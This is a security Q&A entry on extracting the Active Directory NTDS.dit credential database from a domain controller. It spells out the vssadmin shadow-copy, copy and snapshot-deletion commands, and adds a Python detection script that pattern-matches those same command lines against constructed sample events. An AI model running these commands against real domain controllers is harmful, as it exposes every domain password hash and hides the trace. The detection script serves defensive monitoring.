One Day Sec

What are the typical steps to extract the NTDS.dit file from a domain controller using built-in vssadmin?

First, create a snapshot of the system drive with `vssadmin create shadow /for=c:`, which returns a Shadow Copy Volume Name like `\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12`. Then copy the NTDS.dit file using `copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\windows\NTDS\ntds.dit c:\ntds.dit`. Finally, clean up by deleting the snapshot with `vssadmin delete shadows /for=c: /quiet`. This method is simple and uses tools already present on Windows Server. For a comprehensive overview of all methods, refer to Domain Penetration - Obtaining the NTDS.dit File from Domain Controller Servers.
Tags: vssadmin, NTDS.dit, snapshot, Active Directory, hash extraction, domain controller
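
A detection-side view of the sequence above, as an added example that is not part of the original answer: it correlates process command lines per host to flag an ntds.dit read through a shadow-copy device path. The event tuples, the 30-minute window and the `detect` function are assumptions made for illustration, and the sample events are constructed.

```python
import re
from datetime import datetime, timedelta

# Patterns for the three command lines quoted in the answer (case-insensitive).
CREATE = re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\s+shadow\b", re.I)
DELETE = re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b", re.I)
NTDS_VIA_SHADOW = re.compile(r'HarddiskVolumeShadowCopy\d+\\(?:[^\s"]*\\)?ntds\.dit', re.I)
WINDOW = timedelta(minutes=30)  # assumed correlation window, tune per environment

def detect(events):
    """events: (iso_time, host, command_line) tuples; returns a list of alert dicts."""
    alerts, last_create = [], {}
    for ts, host, cmd in sorted(events):
        when = datetime.fromisoformat(ts)
        if NTDS_VIA_SHADOW.search(cmd):
            # ntds.dit read through a shadow-copy device path is high signal alone;
            # a snapshot created on the same host shortly before makes it critical.
            created = last_create.get(host)
            chained = created is not None and when - created <= WINDOW
            alerts.append({"host": host, "time": ts, "command": cmd,
                           "severity": "critical" if chained else "high",
                           "cleanup_seen": False})
        elif CREATE.search(cmd):
            last_create[host] = when
        elif DELETE.search(cmd):
            # Snapshot deletion shortly after the copy is the cleanup step.
            for a in alerts:
                if a["host"] == host and when - datetime.fromisoformat(a["time"]) <= WINDOW:
                    a["cleanup_seen"] = True
    return alerts

# Constructed sample events (not real logs): time, host, process command line.
SAMPLE_EVENTS = [
    ("2024-05-01T01:00:00", "DC02", r"vssadmin list shadows"),
    ("2024-05-01T02:10:05", "DC01", r"vssadmin create shadow /for=c:"),
    ("2024-05-01T02:10:41", "DC01", r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\windows\NTDS\ntds.dit c:\ntds.dit"),
    ("2024-05-01T02:11:02", "DC01", r"vssadmin delete shadows /for=c: /quiet"),
    ("2024-05-01T03:00:00", "FS01", r"vssadmin.exe create shadow /for=d:"),
    ("2024-05-01T04:15:00", "DC03", r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit e:\t.bin"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["severity"], alert["host"], alert["time"], "cleanup:", alert["cleanup_seen"])
```

Because `copy` is a cmd.exe built-in, it appears in process-creation logs only when run as `cmd.exe /c ...`, so the `vssadmin` create and delete events on a domain controller are worth reviewing on their own.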
